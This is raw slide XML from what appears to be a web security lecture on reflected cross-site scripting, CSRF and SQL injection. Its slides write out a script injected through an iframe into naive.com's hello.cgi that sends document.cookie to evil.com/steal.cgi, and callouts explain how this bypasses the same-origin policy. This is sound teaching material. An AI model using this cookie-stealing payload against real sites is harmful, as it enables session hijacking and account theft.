              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>&lt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>iframe</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill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</a:rPr>
                <a:t>src</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>=</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="70000"/>
                </a:lnSpc>
                <a:buFontTx/>
                <a:buNone/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>http://naive.com/hello.cgi?</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="70000"/>
                </a:lnSpc>
                <a:buFontTx/>
                <a:buNone/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>name=&lt;script&gt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>win.open</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>(</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="70000"/>
                </a:lnSpc>
                <a:buFontTx/>
                <a:buNone/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>“http://evil.com/steal.cgi?</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="70000"/>
                </a:lnSpc>
                <a:buFontTx/>
                <a:buNone/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>cookie=”+</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>document.cookie</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>) </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="70000"/>
                </a:lnSpc>
                <a:buFontTx/>
                <a:buNone/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>&lt;/script&gt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1258513" name="AutoShape 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1777BDA-E6DD-7242-AE34-31363945A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648200"/>
            <a:ext cx="2438400" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 21287"/>
              <a:gd name="adj2" fmla="val -88194"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg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chemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Forces victim’s browser to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chemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>call hello.cgi on naive.com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chemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>with this script as “name”</a:t>
            </a:r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518F991C-5303-5A42-9A37-E4C3C860C5D4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505199"/>
            <a:ext cx="2819400" cy="695325"/>
            <a:chOff x="3024" y="2208"/>
            <a:chExt cx="1776" cy="438"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="70692" name="Line 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E1090EF-F80C-234B-B048-C6F3CD401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304"/>
              <a:ext cx="1776" cy="1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Text Box 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{364EC3EF-CBF2-4A47-ADE1-B53A123FF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208"/>
              <a:ext cx="1584" cy="4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buFontTx/>
                <a:buNone/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>GET/ </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>hello.cgi?</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>name</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>=</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="70000"/>
                </a:lnSpc>
                <a:buFontTx/>
                <a:buNone/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>&lt;script&gt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>win.open</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>(“http://</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="70000"/>
                </a:lnSpc>
                <a:buFontTx/>
                <a:buNone/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>evil.com/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>steal.cgi?cookie</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>=”+</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="70000"/>
                </a:lnSpc>
                <a:buFontTx/>
                <a:buNone/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>document.cookie</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>)&lt;/script&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1258517" name="Text Box 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94E500A9-5C9E-A349-93C4-7CD091793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9413" y="3811589"/>
            <a:ext cx="1100366" cy="5355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hello.cgi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executed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFA57E0A-6F0A-CC4D-924A-EA1CB73D1446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516438"/>
            <a:ext cx="2819400" cy="2036762"/>
            <a:chOff x="3024" y="2845"/>
            <a:chExt cx="1776" cy="1283"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="70689" name="Line 23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB08D0DF-8D4E-244D-BE45-ED1E3C5B2A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2976"/>
              <a:ext cx="1776" cy="20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Text Box 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{061C1AAF-6CD3-BE4E-A08F-36F3720CD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845"/>
              <a:ext cx="1584" cy="5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buFontTx/>
                <a:buNone/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>&lt;HTML&gt;Hello, dear</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="70000"/>
                </a:lnSpc>
                <a:buFontTx/>
                <a:buNone/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>&lt;script&gt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>win.open(“http://</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="70000"/>
                </a:lnSpc>
                <a:buFontTx/>
                <a:buNone/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>evil.com/steal.cgi?cookie=”</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="70000"/>
                </a:lnSpc>
                <a:buFontTx/>
                <a:buNone/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>+document.cookie)</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>&lt;/script&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="70000"/>
                </a:lnSpc>
                <a:buFontTx/>
                <a:buNone/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Welcome!&lt;/HTML&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="70691" name="AutoShape 25">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE421A14-B61C-BF45-A36D-C9E0D4067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1" y="3552"/>
              <a:ext cx="1375" cy="576"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 20546"/>
                <a:gd name="adj2" fmla="val -78819"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg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Interpreted as JavaScript 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by victim’s browser; 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opens window and calls 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altLang="en-US" sz="1400">
                  <a:solidFill>
                    <a:schemeClr val="accent2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>steal.cgi on evil.com</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1258522" name="Picture 26" descr="j0215940">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{165EFA7C-1490-E044-BB6B-048992103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667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8523" name="Picture 27" descr="j0215940">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C8B3617-9316-624F-AEDA-86DBA79F9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438400"/>
            <a:ext cx="3048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8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9A188BB-491A-684A-9633-A553D9F0DD26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546726"/>
            <a:ext cx="3429000" cy="473075"/>
            <a:chOff x="432" y="3494"/>
            <a:chExt cx="2160" cy="298"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="70685" name="Line 29">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE3A6F42-D75B-8C4A-9DAE-F11B0B2151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3494"/>
              <a:ext cx="1776" cy="20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Text Box 30">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE119C3C-EF29-234E-8760-86DD3D8AE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504"/>
              <a:ext cx="1584" cy="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buFontTx/>
                <a:buNone/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>GET/ </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>steal.cgi?cookie</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>=</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="70687" name="Picture 31" descr="j0215940">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E2AD50F-F04E-194C-B005-8AC1777CE7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3520"/>
              <a:ext cx="19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688" name="Picture 32" descr="j0215940">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E425312-9A4C-8B46-968A-9E16DE2F27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60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0677" name="AutoShape 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34AB5AB2-FD6A-6242-9033-B95B64DB6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2695575"/>
            <a:ext cx="1143000" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="foldedCorner">
            <a:avLst>
              <a:gd name="adj" fmla="val 28569"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="DDDDD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hello.cgi</a:t>
            </a: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93635D65-401D-644F-8888-272E8A3C0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900" y="1676401"/>
            <a:ext cx="2349500" cy="590931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What is the ORIGIN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of this script?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Line 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E28CDDD7-9FB6-8B49-9A58-D8B09CCB9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322514"/>
            <a:ext cx="0" cy="1489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7A767E20-0650-2F40-81E6-965817DB6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446213"/>
            <a:ext cx="2349500" cy="341312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How about this one?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Line 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E74B5E05-A0A0-0E42-9A52-2C64D41F4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1828800"/>
            <a:ext cx="152400" cy="289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96B92260-B4DA-424E-851A-569F30A59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6096000"/>
            <a:ext cx="2349500" cy="59055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Why does the browser allow this?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="Line 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B3B21A8-B90E-BF4A-A0B6-29FB8343B8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5791200"/>
            <a:ext cx="914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1" name="Picture 27" descr="j0215940">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D5E96F7-6164-694F-A6E0-D5E12AC8C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4267200"/>
            <a:ext cx="3048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759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8502" grpId="0" animBg="1"/>
      <p:bldP spid="1258513" grpId="0" animBg="1"/>
      <p:bldP spid="1258517" grpId="0" animBg="1"/>
      <p:bldP spid="35" grpId="0" animBg="1"/>
      <p:bldP spid="37" grpId="0" animBg="1"/>
      <p:bldP spid="3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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83D9AEA0-58D5-C244-BCB9-6F89B98C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6135C336-892B-CF44-A506-29FB2943238A}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>49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F471F7C2-881E-CE49-9701-DED22B4E1E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458200" cy="5105400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>User is tricked into visiting an honest website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Phishing email, link in a banner ad, comment in a blog</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Bug in website code causes it to echo to the user’s browser an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>arbitrary attack script</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>The origin of this script is now the website itself!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Script can manipulate website contents (DOM) to show bogus information, request sensitive data, control form fields on this page and linked pages, cause user’s browser to attack other websites</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>This violates the “spirit” of the same origin policy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421A7544-A0FF-E340-B542-C230A8E23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0400" y="228600"/>
            <a:ext cx="8128000" cy="914400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Reflected XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="61156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27F84A58-4C75-E242-96A7-E53A1B6F4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24000"/>
            <a:ext cx="1143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med"/>
              </a14:hiddenLine>
            </a:ext>
          </a:extLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none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>
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11267" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82C11B54-5855-D544-8CCD-B8EB72D9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 Web Vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11268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C7A76BC-04AF-6947-83DC-5D307812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XSRF (CSRF) - cross-site request forgery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>SQL injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>XSS (CSS) – cross-site scripting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11269" name="Slide Number Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5FA94B3-9E2F-BD44-A296-9CE5AABC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2D761884-3EE3-D649-BCEA-022FC2A0D90C}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/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9979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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E72B4D4-CFD7-EE4F-98BB-D8FE50A3F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048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/>
              <a:t>Basic Pattern for Reflected XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="72707" name="Picture 18" descr="toshiba_satellite_a105_s4284_laptop">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A708F1F1-5D85-C04F-8973-DE1E3C549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040064"/>
            <a:ext cx="1436688" cy="14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11" descr="CompaqAlphaServerES40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28DE43A0-37A8-8644-B1F2-D0299BC65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275" y="4979988"/>
            <a:ext cx="1155700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4" descr="DS15serverfront">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEDA01A1-EA4B-CB4A-B258-813A0077E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88" y="2343150"/>
            <a:ext cx="2436812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0" name="Text Box 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8FBE884-B4E3-6345-8416-FD3613B42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962150"/>
            <a:ext cx="1665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Attack server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72711" name="Text Box 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E743BB8-2B02-794E-B8FD-F3FFC9B0F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4552950"/>
            <a:ext cx="1736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Server victim </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="72712" name="Straight Arrow Connector 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CFE1EF5-2616-3A44-9823-B830B8127A3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8888" y="2359025"/>
            <a:ext cx="3211512" cy="6873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13" name="Text Box 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{264C3113-0E03-8347-B5D4-972E2982D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324350"/>
            <a:ext cx="1441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User victim</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72714" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80A741E9-3B58-6F4F-ADC5-E1A55B1C8E32}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="20890924">
            <a:off x="4722814" y="2171700"/>
            <a:ext cx="1654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visit web site</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="72715" name="Straight Arrow Connector 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39245923-BCBE-8A4B-9D69-DA6FAE84A8E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3798888" y="2741613"/>
            <a:ext cx="3440112" cy="77311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16" name="TextBox 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF7CD74E-559D-E540-B9D9-875C4B7DFC2B}"/>
              </a:ext>
            </a:extLst>
